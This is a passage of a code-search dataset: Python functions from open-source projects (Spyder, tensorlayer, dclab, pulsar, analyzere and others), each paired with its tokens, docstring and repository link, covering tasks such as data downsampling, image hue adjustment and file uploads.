"reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", ")", "block_start", "=", "break_indices", "[", "0", ",", "1", "]", "for", "i", "in", "xrange", "(", "1", ",", "len", "(", "break_indices", ")", ")", ":", "block_end", "=", "break_indices", "[", "i", ",", "0", "]", "t_pitch", "=", "self", ".", "pitch", "[", "block_start", ":", "block_end", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", "block_start", ":", "block_end", "]", "t_timestamps", "=", "t_timestamps", ".", "reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", ")", "block_start", "=", "break_indices", "[", "i", ",", "1", "]", "if", "block_start", "!=", "len", "(", "self", ".", "pitch", ")", "-", "1", ":", "t_pitch", "=", "self", ".", "pitch", "[", "block_start", ":", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", "block_start", ":", "]", "t_timestamps", "=", "t_timestamps", ".", "reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", ")", "label_start_offset", "=", "(", "window", "-", "hop", ")", "/", "2", "label_end_offset", "=", "label_start_offset", "+", "hop", "#dataNew = np.zeros_like(data)", "#dataNew[:, 0] = data[:, 0]", "data_new", "=", "np", ".", "array", "(", "[", "[", "0", ",", "0", "]", "]", ")", "for", "data", "in", "data_blocks", ":", "start_index", "=", "0", "while", "start_index", "<", "len", "(", "data", ")", "-", "1", ":", "end_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", "]", "[", "0", "]", "+", "window", ")", "segment", "=", "data", "[", "start_index", ":", "end_index", "]", "if", "len", "(", "segment", ")", "==", "0", ":", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "continue", "segment_clean", "=", "np", ".", "delete", "(", "segment", ",", "np", ".", "where", "(", "segment", "[", ":", ",", "1", "]", "==", "-", "10000", ")", ",", "axis", "=", "0", ")", "if", "len", "(", "segment_clean", ")", "==", "0", ":", "#After splitting into blocks, this loop better not come into play", "#raise ValueError(\"This part of the block is absolute silence! Make sure block_thresh >= window!\")", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "continue", "n_clean", "=", "len", "(", "segment_clean", ")", "x_clean", "=", "np", ".", "matrix", "(", "segment_clean", "[", ":", ",", "0", "]", ")", ".", "reshape", "(", "n_clean", ",", "1", ")", "y_clean", "=", "np", ".", "matrix", "(", "segment_clean", "[", ":", ",", "1", "]", ")", ".", "reshape", "(", "n_clean", ",", "1", ")", "#return [x_clean, y_clean]", "theta", "=", "utils", ".", "normal_equation", "(", "x_clean", ",", "y_clean", ")", "#determine the start and end of the segment to be labelled", "label_start_index", "=", "utils", ".", "find_nearest_index", "(", "x_clean", ",", "data", "[", "start_index", ",", "0", "]", "+", "label_start_offset", ")", "label_end_index", "=", "utils", ".", "find_nearest_index", "(", "x_clean", ",", "data", "[", "start_index", ",", "0", "]", "+", "label_end_offset", ")", "x_clean", "=", "x_clean", "[", "label_start_index", ":", "label_end_index", "]", "#return x_clean", "x_clean", "=", "np", ".", "insert", "(", "x_clean", ",", "0", ",", "np", ".", "ones", "(", "len", "(", "x_clean", ")", ")", ",", "axis", "=", "1", ")", "newy", "=", "x_clean", "*", "theta", "result", "=", "np", ".", "append", "(", "x_clean", "[", ":", ",", "1", "]", ",", "newy", ",", "axis", "=", "1", ")", "data_new", "=", "np", ".", "append", "(", "data_new", ",", "result", ",", "axis", "=", "0", ")", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "return", "[", "data_new", "[", ":", ",", "0", "]", ",", "data_new", "[", ":", ",", "1", "]", "]" ]
Fits lines to pitch contours. :param window: size of each chunk to which linear equation is to be fit (in milliseconds). To keep it simple, hop is chosen to be one third of the window. :param break_thresh: If there is silence beyond this limit (in milliseconds), the contour will be broken there into two so that we don't fit a line over and including the silent region.
[ "Fits", "lines", "to", "pitch", "contours", "." ]
python
train
50.205882
spyder-ide/spyder
spyder/preferences/shortcuts.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/preferences/shortcuts.py#L590-L607
def headerData(self, section, orientation, role=Qt.DisplayRole): """Qt Override.""" if role == Qt.TextAlignmentRole: if orientation == Qt.Horizontal: return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter)) return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter)) if role != Qt.DisplayRole: return to_qvariant() if orientation == Qt.Horizontal: if section == CONTEXT: return to_qvariant(_("Context")) elif section == NAME: return to_qvariant(_("Name")) elif section == SEQUENCE: return to_qvariant(_("Shortcut")) elif section == SEARCH_SCORE: return to_qvariant(_("Score")) return to_qvariant()
[ "def", "headerData", "(", "self", ",", "section", ",", "orientation", ",", "role", "=", "Qt", ".", "DisplayRole", ")", ":", "if", "role", "==", "Qt", ".", "TextAlignmentRole", ":", "if", "orientation", "==", "Qt", ".", "Horizontal", ":", "return", "to_qvariant", "(", "int", "(", "Qt", ".", "AlignHCenter", "|", "Qt", ".", "AlignVCenter", ")", ")", "return", "to_qvariant", "(", "int", "(", "Qt", ".", "AlignRight", "|", "Qt", ".", "AlignVCenter", ")", ")", "if", "role", "!=", "Qt", ".", "DisplayRole", ":", "return", "to_qvariant", "(", ")", "if", "orientation", "==", "Qt", ".", "Horizontal", ":", "if", "section", "==", "CONTEXT", ":", "return", "to_qvariant", "(", "_", "(", "\"Context\"", ")", ")", "elif", "section", "==", "NAME", ":", "return", "to_qvariant", "(", "_", "(", "\"Name\"", ")", ")", "elif", "section", "==", "SEQUENCE", ":", "return", "to_qvariant", "(", "_", "(", "\"Shortcut\"", ")", ")", "elif", "section", "==", "SEARCH_SCORE", ":", "return", "to_qvariant", "(", "_", "(", "\"Score\"", ")", ")", "return", "to_qvariant", "(", ")" ]
Qt Override.
[ "Qt", "Override", "." ]
python
train
44.444444
ZELLMECHANIK-DRESDEN/dclab
dclab/downsampling.py
https://github.com/ZELLMECHANIK-DRESDEN/dclab/blob/79002c4356e7020c2ba73ab0a3819c9abd4affec/dclab/downsampling.py#L72-L167
def downsample_grid(a, b, samples, ret_idx=False): """Content-based downsampling for faster visualization The arrays `a` and `b` make up a 2D scatter plot with high and low density values. This method takes out points at indices with high density. Parameters ---------- a, b: 1d ndarrays The input arrays to downsample samples: int The desired number of samples remove_invalid: bool Remove nan and inf values before downsampling ret_idx: bool Also return a boolean array that corresponds to the downsampled indices in `a` and `b`. Returns ------- dsa, dsb: 1d ndarrays of shape (samples,) The arrays `a` and `b` downsampled by evenly selecting points and pseudo-randomly adding or removing points to match `samples`. idx: 1d boolean array with same shape as `a` Only returned if `ret_idx` is True. A boolean array such that `a[idx] == dsa` """ # fixed random state for this method rs = np.random.RandomState(seed=47).get_state() samples = int(samples) if samples and samples < a.size: # The events to keep keep = np.zeros_like(a, dtype=bool) # 1. Produce evenly distributed samples # Choosing grid-size: # - large numbers tend to show actual structures of the sample, # which is not desired for plotting # - small numbers tend will not result in too few samples and, # in order to reach the desired samples, the data must be # upsampled again. # 300 is about the size of the plot in marker sizes and yields # good results. grid_size = 300 xpx = norm(a, a, b) * grid_size ypx = norm(b, b, a) * grid_size # The events on the grid to process toproc = np.ones((grid_size, grid_size), dtype=bool) for ii in range(xpx.size): xi = xpx[ii] yi = ypx[ii] # filter for overlapping events if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]: toproc[int(xi-1), int(yi-1)] = False # include event keep[ii] = True # 2. Make sure that we reach `samples` by adding or # removing events. diff = np.sum(keep) - samples if diff > 0: # Too many samples rem_indices = np.where(keep)[0] np.random.set_state(rs) rem = np.random.choice(rem_indices, size=diff, replace=False) keep[rem] = False elif diff < 0: # Not enough samples add_indices = np.where(~keep)[0] np.random.set_state(rs) add = np.random.choice(add_indices, size=abs(diff), replace=False) keep[add] = True assert np.sum(keep) == samples, "sanity check" asd = a[keep] bsd = b[keep] assert np.allclose(a[keep], asd, equal_nan=True), "sanity check" assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check" else: keep = np.ones_like(a, dtype=bool) asd = a bsd = b if ret_idx: return asd, bsd, keep else: return asd, bsd
[ "def", "downsample_grid", "(", "a", ",", "b", ",", "samples", ",", "ret_idx", "=", "False", ")", ":", "# fixed random state for this method", "rs", "=", "np", ".", "random", ".", "RandomState", "(", "seed", "=", "47", ")", ".", "get_state", "(", ")", "samples", "=", "int", "(", "samples", ")", "if", "samples", "and", "samples", "<", "a", ".", "size", ":", "# The events to keep", "keep", "=", "np", ".", "zeros_like", "(", "a", ",", "dtype", "=", "bool", ")", "# 1. Produce evenly distributed samples", "# Choosing grid-size:", "# - large numbers tend to show actual structures of the sample,", "# which is not desired for plotting", "# - small numbers tend will not result in too few samples and,", "# in order to reach the desired samples, the data must be", "# upsampled again.", "# 300 is about the size of the plot in marker sizes and yields", "# good results.", "grid_size", "=", "300", "xpx", "=", "norm", "(", "a", ",", "a", ",", "b", ")", "*", "grid_size", "ypx", "=", "norm", "(", "b", ",", "b", ",", "a", ")", "*", "grid_size", "# The events on the grid to process", "toproc", "=", "np", ".", "ones", "(", "(", "grid_size", ",", "grid_size", ")", ",", "dtype", "=", "bool", ")", "for", "ii", "in", "range", "(", "xpx", ".", "size", ")", ":", "xi", "=", "xpx", "[", "ii", "]", "yi", "=", "ypx", "[", "ii", "]", "# filter for overlapping events", "if", "valid", "(", "xi", ",", "yi", ")", "and", "toproc", "[", "int", "(", "xi", "-", "1", ")", ",", "int", "(", "yi", "-", "1", ")", "]", ":", "toproc", "[", "int", "(", "xi", "-", "1", ")", ",", "int", "(", "yi", "-", "1", ")", "]", "=", "False", "# include event", "keep", "[", "ii", "]", "=", "True", "# 2. Make sure that we reach `samples` by adding or", "# removing events.", "diff", "=", "np", ".", "sum", "(", "keep", ")", "-", "samples", "if", "diff", ">", "0", ":", "# Too many samples", "rem_indices", "=", "np", ".", "where", "(", "keep", ")", "[", "0", "]", "np", ".", "random", ".", "set_state", "(", "rs", ")", "rem", "=", "np", ".", "random", ".", "choice", "(", "rem_indices", ",", "size", "=", "diff", ",", "replace", "=", "False", ")", "keep", "[", "rem", "]", "=", "False", "elif", "diff", "<", "0", ":", "# Not enough samples", "add_indices", "=", "np", ".", "where", "(", "~", "keep", ")", "[", "0", "]", "np", ".", "random", ".", "set_state", "(", "rs", ")", "add", "=", "np", ".", "random", ".", "choice", "(", "add_indices", ",", "size", "=", "abs", "(", "diff", ")", ",", "replace", "=", "False", ")", "keep", "[", "add", "]", "=", "True", "assert", "np", ".", "sum", "(", "keep", ")", "==", "samples", ",", "\"sanity check\"", "asd", "=", "a", "[", "keep", "]", "bsd", "=", "b", "[", "keep", "]", "assert", "np", ".", "allclose", "(", "a", "[", "keep", "]", ",", "asd", ",", "equal_nan", "=", "True", ")", ",", "\"sanity check\"", "assert", "np", ".", "allclose", "(", "b", "[", "keep", "]", ",", "bsd", ",", "equal_nan", "=", "True", ")", ",", "\"sanity check\"", "else", ":", "keep", "=", "np", ".", "ones_like", "(", "a", ",", "dtype", "=", "bool", ")", "asd", "=", "a", "bsd", "=", "b", "if", "ret_idx", ":", "return", "asd", ",", "bsd", ",", "keep", "else", ":", "return", "asd", ",", "bsd" ]
Content-based downsampling for faster visualization The arrays `a` and `b` make up a 2D scatter plot with high and low density values. This method takes out points at indices with high density. Parameters ---------- a, b: 1d ndarrays The input arrays to downsample samples: int The desired number of samples remove_invalid: bool Remove nan and inf values before downsampling ret_idx: bool Also return a boolean array that corresponds to the downsampled indices in `a` and `b`. Returns ------- dsa, dsb: 1d ndarrays of shape (samples,) The arrays `a` and `b` downsampled by evenly selecting points and pseudo-randomly adding or removing points to match `samples`. idx: 1d boolean array with same shape as `a` Only returned if `ret_idx` is True. A boolean array such that `a[idx] == dsa`
[ "Content", "-", "based", "downsampling", "for", "faster", "visualization" ]
python
train
33.96875
BD2KGenomics/toil-scripts
src/toil_scripts/adam_pipeline/adam_preprocessing.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/adam_pipeline/adam_preprocessing.py#L200-L210
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil): """ Upload file hdfsName from hdfs to s3 """ if mock_mode(): truncate_file(master_ip, hdfs_name, spark_on_toil) log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name) call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory) remove_file(master_ip, hdfs_name, spark_on_toil)
[ "def", "upload_data", "(", "job", ",", "master_ip", ",", "inputs", ",", "hdfs_name", ",", "upload_name", ",", "spark_on_toil", ")", ":", "if", "mock_mode", "(", ")", ":", "truncate_file", "(", "master_ip", ",", "hdfs_name", ",", "spark_on_toil", ")", "log", ".", "info", "(", "\"Uploading output BAM %s to %s.\"", ",", "hdfs_name", ",", "upload_name", ")", "call_conductor", "(", "job", ",", "master_ip", ",", "hdfs_name", ",", "upload_name", ",", "memory", "=", "inputs", ".", "memory", ")", "remove_file", "(", "master_ip", ",", "hdfs_name", ",", "spark_on_toil", ")" ]
Upload file hdfsName from hdfs to s3
[ "Upload", "file", "hdfsName", "from", "hdfs", "to", "s3" ]
python
train
37.454545
kata198/AdvancedHTMLParser
AdvancedHTMLParser/Tags.py
https://github.com/kata198/AdvancedHTMLParser/blob/06aeea5d8e2ea86e155aae0fc237623d3e9b7f9d/AdvancedHTMLParser/Tags.py#L673-L687
def removeChildren(self, children): ''' removeChildren - Remove multiple child AdvancedTags. @see removeChild @return list<AdvancedTag/None> - A list of all tags removed in same order as passed. Item is "None" if it was not attached to this node, and thus was not removed. ''' ret = [] for child in children: ret.append( self.removeChild(child) ) return ret
[ "def", "removeChildren", "(", "self", ",", "children", ")", ":", "ret", "=", "[", "]", "for", "child", "in", "children", ":", "ret", ".", "append", "(", "self", ".", "removeChild", "(", "child", ")", ")", "return", "ret" ]
removeChildren - Remove multiple child AdvancedTags. @see removeChild @return list<AdvancedTag/None> - A list of all tags removed in same order as passed. Item is "None" if it was not attached to this node, and thus was not removed.
[ "removeChildren", "-", "Remove", "multiple", "child", "AdvancedTags", "." ]
python
train
30.066667
google/grumpy
third_party/pythonparser/parser.py
https://github.com/google/grumpy/blob/3ec87959189cfcdeae82eb68a47648ac25ceb10b/third_party/pythonparser/parser.py#L530-L535
def single_input(self, body): """single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE""" loc = None if body != []: loc = body[0].loc return ast.Interactive(body=body, loc=loc)
[ "def", "single_input", "(", "self", ",", "body", ")", ":", "loc", "=", "None", "if", "body", "!=", "[", "]", ":", "loc", "=", "body", "[", "0", "]", ".", "loc", "return", "ast", ".", "Interactive", "(", "body", "=", "body", ",", "loc", "=", "loc", ")" ]
single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
[ "single_input", ":", "NEWLINE", "|", "simple_stmt", "|", "compound_stmt", "NEWLINE" ]
python
valid
36.833333
quantmind/dynts
dynts/backends/r/base.py
https://github.com/quantmind/dynts/blob/21ac57c648bfec402fa6b1fe569496cf098fb5e8/dynts/backends/r/base.py#L117-L126
def rcts(self, command, *args, **kwargs): '''General function for applying a rolling R function to a timeserie''' cls = self.__class__ name = kwargs.pop('name','') date = kwargs.pop('date',None) data = kwargs.pop('data',None) kwargs.pop('bycolumn',None) ts = cls(name=name,date=date,data=data) ts._ts = self.rc(command, *args, **kwargs) return ts
[ "def", "rcts", "(", "self", ",", "command", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "cls", "=", "self", ".", "__class__", "name", "=", "kwargs", ".", "pop", "(", "'name'", ",", "''", ")", "date", "=", "kwargs", ".", "pop", "(", "'date'", ",", "None", ")", "data", "=", "kwargs", ".", "pop", "(", "'data'", ",", "None", ")", "kwargs", ".", "pop", "(", "'bycolumn'", ",", "None", ")", "ts", "=", "cls", "(", "name", "=", "name", ",", "date", "=", "date", ",", "data", "=", "data", ")", "ts", ".", "_ts", "=", "self", ".", "rc", "(", "command", ",", "*", "args", ",", "*", "*", "kwargs", ")", "return", "ts" ]
General function for applying a rolling R function to a timeserie
[ "General", "function", "for", "applying", "a", "rolling", "R", "function", "to", "a", "timeserie" ]
python
train
41.9
calmjs/nunja
src/nunja/registry.py
https://github.com/calmjs/nunja/blob/37ba114ca2239322718fd9994bb078c037682c33/src/nunja/registry.py#L260-L271
def verify_path(self, mold_id_path): """ Lookup and verify path. """ try: path = self.lookup_path(mold_id_path) if not exists(path): raise KeyError except KeyError: raise_os_error(ENOENT) return path
[ "def", "verify_path", "(", "self", ",", "mold_id_path", ")", ":", "try", ":", "path", "=", "self", ".", "lookup_path", "(", "mold_id_path", ")", "if", "not", "exists", "(", "path", ")", ":", "raise", "KeyError", "except", "KeyError", ":", "raise_os_error", "(", "ENOENT", ")", "return", "path" ]
Lookup and verify path.
[ "Lookup", "and", "verify", "path", "." ]
python
train
24.083333
galaxyproject/pulsar
pulsar/client/client.py
https://github.com/galaxyproject/pulsar/blob/9ab6683802884324652da0a9f0808c7eb59d3ab4/pulsar/client/client.py#L196-L220
def fetch_output(self, path, name, working_directory, action_type, output_type): """ Fetch (transfer, copy, etc...) an output from the remote Pulsar server. **Parameters** path : str Local path of the dataset. name : str Remote name of file (i.e. path relative to remote staging output or working directory). working_directory : str Local working_directory for the job. action_type : str Where to find file on Pulsar (output_workdir or output). legacy is also an option in this case Pulsar is asked for location - this will only be used if targetting an older Pulsar server that didn't return statuses allowing this to be inferred. """ if output_type in ['output_workdir', 'output_metadata']: self._populate_output_path(name, path, action_type, output_type) elif output_type == 'output': self._fetch_output(path=path, name=name, action_type=action_type) else: raise Exception("Unknown output_type %s" % output_type)
[ "def", "fetch_output", "(", "self", ",", "path", ",", "name", ",", "working_directory", ",", "action_type", ",", "output_type", ")", ":", "if", "output_type", "in", "[", "'output_workdir'", ",", "'output_metadata'", "]", ":", "self", ".", "_populate_output_path", "(", "name", ",", "path", ",", "action_type", ",", "output_type", ")", "elif", "output_type", "==", "'output'", ":", "self", ".", "_fetch_output", "(", "path", "=", "path", ",", "name", "=", "name", ",", "action_type", "=", "action_type", ")", "else", ":", "raise", "Exception", "(", "\"Unknown output_type %s\"", "%", "output_type", ")" ]
Fetch (transfer, copy, etc...) an output from the remote Pulsar server. **Parameters** path : str Local path of the dataset. name : str Remote name of file (i.e. path relative to remote staging output or working directory). working_directory : str Local working_directory for the job. action_type : str Where to find file on Pulsar (output_workdir or output). legacy is also an option in this case Pulsar is asked for location - this will only be used if targetting an older Pulsar server that didn't return statuses allowing this to be inferred.
[ "Fetch", "(", "transfer", "copy", "etc", "...", ")", "an", "output", "from", "the", "remote", "Pulsar", "server", "." ]
python
train
44.52
PGower/PyCanvas
pycanvas/apis/pages.py
https://github.com/PGower/PyCanvas/blob/68520005382b440a1e462f9df369f54d364e21e8/pycanvas/apis/pages.py#L339-L358
def show_page_courses(self, url, course_id): """ Show page. Retrieve the content of a wiki page """ path = {} data = {} params = {} # REQUIRED - PATH - course_id """ID""" path["course_id"] = course_id # REQUIRED - PATH - url """ID""" path["url"] = url self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path)) return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True)
[ "def", "show_page_courses", "(", "self", ",", "url", ",", "course_id", ")", ":", "path", "=", "{", "}", "data", "=", "{", "}", "params", "=", "{", "}", "# REQUIRED - PATH - course_id\r", "\"\"\"ID\"\"\"", "path", "[", "\"course_id\"", "]", "=", "course_id", "# REQUIRED - PATH - url\r", "\"\"\"ID\"\"\"", "path", "[", "\"url\"", "]", "=", "url", "self", ".", "logger", ".", "debug", "(", "\"GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}\"", ".", "format", "(", "params", "=", "params", ",", "data", "=", "data", ",", "*", "*", "path", ")", ")", "return", "self", ".", "generic_request", "(", "\"GET\"", ",", "\"/api/v1/courses/{course_id}/pages/{url}\"", ".", "format", "(", "*", "*", "path", ")", ",", "data", "=", "data", ",", "params", "=", "params", ",", "single_item", "=", "True", ")" ]
Show page. Retrieve the content of a wiki page
[ "Show", "page", ".", "Retrieve", "the", "content", "of", "a", "wiki", "page" ]
python
train
33.4
ManiacalLabs/BiblioPixel
bibliopixel/project/edit_queue.py
https://github.com/ManiacalLabs/BiblioPixel/blob/fd97e6c651a4bbcade64733847f4eec8f7704b7c/bibliopixel/project/edit_queue.py#L15-L24
def put_edit(self, f, *args, **kwds): """ Defer an edit to run on the EditQueue. :param callable f: The function to be called :param tuple args: Positional arguments to the function :param tuple kwds: Keyword arguments to the function :throws queue.Full: if the queue is full """ self.put_nowait(functools.partial(f, *args, **kwds))
[ "def", "put_edit", "(", "self", ",", "f", ",", "*", "args", ",", "*", "*", "kwds", ")", ":", "self", ".", "put_nowait", "(", "functools", ".", "partial", "(", "f", ",", "*", "args", ",", "*", "*", "kwds", ")", ")" ]
Defer an edit to run on the EditQueue. :param callable f: The function to be called :param tuple args: Positional arguments to the function :param tuple kwds: Keyword arguments to the function :throws queue.Full: if the queue is full
[ "Defer", "an", "edit", "to", "run", "on", "the", "EditQueue", "." ]
python
valid
38.8
RudolfCardinal/pythonlib
cardinal_pythonlib/convert.py
https://github.com/RudolfCardinal/pythonlib/blob/0b84cb35f38bd7d8723958dae51b480a829b7227/cardinal_pythonlib/convert.py#L113-L122
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None: """ Converts the specified attributes of an object to lower case, modifying the object in place. """ for a in attrs: value = getattr(obj, a) if value is None: continue setattr(obj, a, value.lower())
[ "def", "convert_attrs_to_lowercase", "(", "obj", ":", "Any", ",", "attrs", ":", "Iterable", "[", "str", "]", ")", "->", "None", ":", "for", "a", "in", "attrs", ":", "value", "=", "getattr", "(", "obj", ",", "a", ")", "if", "value", "is", "None", ":", "continue", "setattr", "(", "obj", ",", "a", ",", "value", ".", "lower", "(", ")", ")" ]
Converts the specified attributes of an object to lower case, modifying the object in place.
[ "Converts", "the", "specified", "attributes", "of", "an", "object", "to", "lower", "case", "modifying", "the", "object", "in", "place", "." ]
python
train
31.7
tensorlayer/tensorlayer
tensorlayer/prepro.py
https://github.com/tensorlayer/tensorlayer/blob/aa9e52e36c7058a7e6fd81d36563ca6850b21956/tensorlayer/prepro.py#L1752-L1808
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False): """Adjust hue of an RGB image. This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type. For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. Parameters ----------- im : numpy.array An image with values between 0 and 255. hout : float The scale value for adjusting hue. - If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue. - If is_offset is True, add this value as the offset to the hue channel. is_offset : boolean Whether `hout` is added on HSV as offset or not. Default is True. is_clip : boolean If HSV value smaller than 0, set to 0. Default is True. is_random : boolean If True, randomly change hue. Default is False. Returns ------- numpy.array A processed image. Examples --------- Random, add a random value between -0.2 and 0.2 as the offset to every hue values. >>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False) Non-random, make all hue to green. >>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False) References ----------- - `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. - `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__. - `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__. """ hsv = rgb_to_hsv(im) if is_random: hout = np.random.uniform(-hout, hout) if is_offset: hsv[..., 0] += hout else: hsv[..., 0] = hout if is_clip: hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots rgb = hsv_to_rgb(hsv) return rgb
[ "def", "adjust_hue", "(", "im", ",", "hout", "=", "0.66", ",", "is_offset", "=", "True", ",", "is_clip", "=", "True", ",", "is_random", "=", "False", ")", ":", "hsv", "=", "rgb_to_hsv", "(", "im", ")", "if", "is_random", ":", "hout", "=", "np", ".", "random", ".", "uniform", "(", "-", "hout", ",", "hout", ")", "if", "is_offset", ":", "hsv", "[", "...", ",", "0", "]", "+=", "hout", "else", ":", "hsv", "[", "...", ",", "0", "]", "=", "hout", "if", "is_clip", ":", "hsv", "[", "...", ",", "0", "]", "=", "np", ".", "clip", "(", "hsv", "[", "...", ",", "0", "]", ",", "0", ",", "np", ".", "inf", ")", "# Hao : can remove green dots", "rgb", "=", "hsv_to_rgb", "(", "hsv", ")", "return", "rgb" ]
Adjust hue of an RGB image. This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type. For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. Parameters ----------- im : numpy.array An image with values between 0 and 255. hout : float The scale value for adjusting hue. - If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue. - If is_offset is True, add this value as the offset to the hue channel. is_offset : boolean Whether `hout` is added on HSV as offset or not. Default is True. is_clip : boolean If HSV value smaller than 0, set to 0. Default is True. is_random : boolean If True, randomly change hue. Default is False. Returns ------- numpy.array A processed image. Examples --------- Random, add a random value between -0.2 and 0.2 as the offset to every hue values. >>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False) Non-random, make all hue to green. >>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False) References ----------- - `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. - `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__. - `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
[ "Adjust", "hue", "of", "an", "RGB", "image", "." ]
python
valid
38.140351
chrislim2888/IP2Location-Python
IP2Location.py
https://github.com/chrislim2888/IP2Location-Python/blob/6b2a7d3a5e61c9f8efda5ae96c7064f9a7714621/IP2Location.py#L189-L192
def get_mcc(self, ip): ''' Get mcc ''' rec = self.get_all(ip) return rec and rec.mcc
[ "def", "get_mcc", "(", "self", ",", "ip", ")", ":", "rec", "=", "self", ".", "get_all", "(", "ip", ")", "return", "rec", "and", "rec", ".", "mcc" ]
Get mcc
[ "Get", "mcc" ]
python
train
26.25
analyzere/analyzere-python
analyzere/base_resources.py
https://github.com/analyzere/analyzere-python/blob/0593d5b7b69c4df6d6dbc80387cc6ff5dc5f4e8f/analyzere/base_resources.py#L309-L366
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size, poll_interval=analyzere.upload_poll_interval, upload_callback=lambda x: None, commit_callback=lambda x: None): """ Accepts a file-like object or string and uploads it. Files are automatically uploaded in chunks. The default chunk size is 16MiB and can be overwritten by specifying the number of bytes in the ``chunk_size`` variable. Accepts an optional poll_interval for temporarily overriding the default value `analyzere.upload_poll_interval`. Implements the tus protocol. Takes optional callbacks that return the percentage complete for the given "phase" of upload: upload/commit. Callback values are returned as 10.0 for 10% """ if not callable(upload_callback): raise Exception('provided upload_callback is not callable') if not callable(commit_callback): raise Exception('provided commit_callback is not callable') file_obj = StringIO(file_or_str) if isinstance( file_or_str, six.string_types) else file_or_str # Upload file with known entity size if file object supports random # access. length = None if hasattr(file_obj, 'seek'): length = utils.file_length(file_obj) # Initiate upload session request_raw('post', self._data_path, headers={'Entity-Length': str(length)}) else: request_raw('post', self._data_path) # Upload chunks for chunk, offset in utils.read_in_chunks(file_obj, chunk_size): headers = {'Offset': str(offset), 'Content-Type': 'application/offset+octet-stream'} request_raw('patch', self._data_path, headers=headers, body=chunk) # if there is a known size, and an upload callback, call it if length: upload_callback(offset * 100.0 / length) upload_callback(100.0) # Commit the session request_raw('post', self._commit_path) # Block until data has finished processing while True: resp = self.upload_status if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'): commit_callback(100.0) return resp else: commit_callback(float(resp.commit_progress)) time.sleep(poll_interval)
